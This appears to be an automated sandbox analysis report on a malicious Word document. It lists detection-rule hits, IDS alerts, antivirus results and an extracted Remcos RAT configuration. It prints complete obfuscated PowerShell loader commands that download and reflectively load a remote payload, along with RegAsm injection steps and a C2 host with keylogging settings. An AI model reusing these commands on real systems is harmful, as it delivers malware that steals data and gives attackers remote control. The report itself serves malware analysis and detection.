'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3796, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3868, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3796, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3868, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3036, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv", ProcessId: 2092, ProcessName: RegAsm.exe
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3364, Protocol: tcp, SourceIp: 172.67.216.244, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3796, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3868, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3364, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3916, TargetFilename: C:\Users\user\AppData\Local\Temp\0nijhtai.iov.ps1

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: F8 BC 67 43 59 29 BE 56 B0 E1 4E EA 1A 72 4F 4E A5 20 93 B6 A7 9F F7 A0 33 BD 88 4F 68 8C D4 3B 20 47 FE 04 CE AF D6 CC 99 FA 7A D3 52 65 0B 99 61 A0 68 7D 64 97 64 F3 6A A9 13 6E 81 A8 93 EB 02 E7 A1 85 5D 3B CE A6 25 92 FF 89 58 C3 E7 82 E2 6B AC F3 76 83 5B E6 3C 76 E8 1B C5 40 00 0A 03 C2 3D 70 44 BB 60 9A 7D 55 CD 4E AE 57 EE D6 E1 21 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3036, TargetObject: HKEY_CURRENT_USER\Software\Rmc-EPF38I\exepath
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T15:00:25.031872+020020204231Exploit Kit Activity Detected91.134.96.17780192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T15:00:25.031872+020020204251Exploit Kit Activity Detected91.134.96.17780192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T15:00:26.548838+020020365941Malware Command and Control Activity Detected192.168.2.224917445.90.89.986845TCP
                  2024-09-30T15:00:28.032644+020020365941Malware Command and Control Activity Detected192.168.2.224917545.90.89.986845TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-30T15:00:27.814190+020028033043Unknown Traffic192.168.2.2249176178.237.33.5080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{29D0D8AE-3680-4F24-B6B5-4CF617677437}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Source: 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro:6845:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EPF38I", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.proVirustotal: Detection: 8%Perma Link
                  Source: factura proforma .docx.docVirustotal: Detection: 11%Perma Link
                  Source: factura proforma .docx.docReversingLabs: Detection: 13%
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPE
